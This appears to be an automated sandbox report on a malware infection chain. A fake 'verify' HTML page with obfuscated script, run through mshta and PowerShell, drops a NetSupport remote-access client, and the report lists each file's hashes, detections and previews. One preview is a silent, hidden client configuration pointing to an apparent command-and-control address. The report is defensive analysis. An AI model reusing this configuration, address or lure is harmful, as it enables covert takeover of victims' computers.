C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\Ray-verify[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	10688
Entropy (8bit):	6.1517595439755635
Encrypted:	false
SSDEEP:
MD5:	63C1AF5A722603C499BD602020D2AC68
SHA1:	0DFFADD44D4B654C15F64FCFA98798912E6C093E
SHA-256:	9C5BE4A4CDFA5DB952B3BBDEFAE6CDEDD93A4E87F923BCA2A7DB1DE5A9CD5469
SHA-512:	DA3207A8CFAC736504C9943607046A4E9BAF0AAE8C21D9DAED988092066E8D9389E6FEB5898D60DDE763BB6AC1D87BA64B9CD58E987692D267849A1E94B0F734
Malicious:	false
Reputation:	unknown
Preview:	<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode\|\|document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');c6efa\|=lII;zLP=location.protocol+'0FD';dWPZ6wKYJqX='o164S5U2CQF8';</script><script>iLg83J6=new Array();iLg83J6[0]='n\152%33\103%72%33\170W\160%37%30\172';bCn0706=new Array();bCn0706[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E~G~

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18904
Entropy (8bit):	5.485994203322045
Encrypted:	false
SSDEEP:
MD5:	71771D9AFB0249776D302DA152F8206A
SHA1:	568422CAB699B6017F35B56CB037C89FE83937BF
SHA-256:	B8E72D266C52549EE52DE52E5326D2F7747DC4D5D7C2C4585D3747534A0B5112
SHA-512:	675988B4947A68FB21BA45F837E50922114F91BF104914BF2AFB92B029F119A753F9AE9DFA73BD589C4BCD1D0FED90311485B098866CC47EC10B5EDA458A09AD
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........H...............o..b~.D.poM...Q..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....e.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.F.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmbeadtq.mgw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\NSM.LIC

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.119720931145611
Encrypted:	false
SSDEEP:
MD5:	7067AF414215EE4C50BFCD3EA43C84F0
SHA1:	C331D410672477844A4CA87F43A14E643C863AF9
SHA-256:	2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
SHA-512:	17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
Malicious:	true
Reputation:	unknown
Preview:	1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

C:\Users\user\AppData\Roaming\HzYATQ\NSM.ini

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Generic INItialization configuration [Features]
Category:	dropped
Size (bytes):	6458
Entropy (8bit):	4.645519507940197
Encrypted:	false
SSDEEP:
MD5:	88B1DAB8F4FD1AE879685995C90BD902
SHA1:	3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
SHA-256:	60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
SHA-512:	4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
Malicious:	false
Reputation:	unknown
Preview:	..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3735416
Entropy (8bit):	6.525042992590476
Encrypted:	false
SSDEEP:
MD5:	00587238D16012152C2E951A087F2CC9
SHA1:	C4E27A43075CE993FF6BB033360AF386B2FC58FF
SHA-256:	63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
SHA-512:	637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	396664
Entropy (8bit):	6.809064783360712
Encrypted:	false
SSDEEP:
MD5:	EAB603D12705752E3D268D86DFF74ED4
SHA1:	01873977C871D3346D795CF7E3888685DE9F0B16
SHA-256:	6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
SHA-512:	77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\client32.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	120288
Entropy (8bit):	5.258428134726746
Encrypted:	false
SSDEEP:
MD5:	EE75B57B9300AAB96530503BFAE8A2F2
SHA1:	98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07
SHA-256:	06A0A243811E9C4738A9D413597659CA8D07B00F640B74ADC9CB351C179B3268
SHA-512:	660259BB0FD317C7FB76505DA8CBC477E146615FEC10E02779CD4F527AEB00CAED833AF72F90B128BB62F10326209125E809712D9ACB41017E503126E5F85673
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.g.W.g.W.g.^...U.g.8...T.g.W.f.R.g.8..V.g.8...V.g.8...V.g.RichW.g.........PE..L...1.oe.....................r...... ........ ....@..................................b....@.................................< ..<....0..Hm...........x...].......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc...Hm...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\client32.ini

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.603856649376801
Encrypted:	false
SSDEEP:
MD5:	8C978A6D8F380D59C9DB4AFE06218B89
SHA1:	1FA286E91C8AA0EEB99276AF72D40E02D2148C51
SHA-256:	D8C2B28FF9F90626F7E669B4FBDB45ED553A3CB1A980E23FDFEA4FBBDDDFC502
SHA-512:	B74539AE7FC88756C1E1404814D33197CD8709AADDF2C43167F2CF157E947C2CABAD759414038DBE5E83B201786052E94AB53BD97BB4DE68744F514F8AE7F552
Malicious:	false
Reputation:	unknown
Preview:	0xe755af83....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableCloseApps=0..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=92.255.85.135:443..gsk=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..gskmode=0..GSK=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..GSKX=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..

C:\Users\user\AppData\Roaming\HzYATQ\msvcr100.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\nskbfltr.inf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Reputation:	unknown
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HzYATQ\remcmdstub.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	77280
Entropy (8bit):	6.793716898125355
Encrypted:	false
SSDEEP:
MD5:	1768C9971CEA4CC10C7DD45A5F8F022A
SHA1:	3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7
SHA-256:	6558B3307215C4B73FC96DC552213427FB9B28C0CB282FE6C38324F1E68E87D6
SHA-512:	F83BF23ABCE316CB1B91A0AC89C1A709A58A7EC49C8493140AD7DC7A629E8F75032057889E42BE3091CF351760348380634F660C47A3897F69E398849CA46780
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L...T.oe.....................J.......!............@.......................... ......Q.....@....................................<.......8................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...8...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 22:15:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9919208321834843
Encrypted:	false
SSDEEP:
MD5:	8B8521F15A5399E66EEC8D3EE61025FE
SHA1:	AE4AA31FC7E24C8EBFF972CB7396FFB212F215E2
SHA-256:	E8FD784730D50729583DDD77A0AF86113FA311FBBC2E2423F47ECC89C335332E
SHA-512:	F7177FD005EFF38D6944A98DEF8EBEAA0E083823792182AC6E1A9562E417B315B791CD5F8E0EC365C46BF76FF2B33BD51D69A643509E1E1987D02DC54D27DA9B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,........!+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............=.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 22:15:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.004789290358075
Encrypted:	false
SSDEEP:
MD5:	5B721A78A341DCEF91522ED3C3529309
SHA1:	4C171FF903FCA3F94BDD84F8AEF3B2128A2D53D0
SHA-256:	90BD6056A1D1CDA61EDDE0D2257E2E656C559C15B2C964D18AC726CB57D53CFD
SHA-512:	A9ACAB02B041E6439B8AB701CD40819D597D02EC3EC2F425B5130FD0C7F64B48D6F90980F5C4F1C131C75DD48628974A8D3657C8C1C681D2E160110BAB4F2E6C
Malicious:	false
Reputation:	unknown
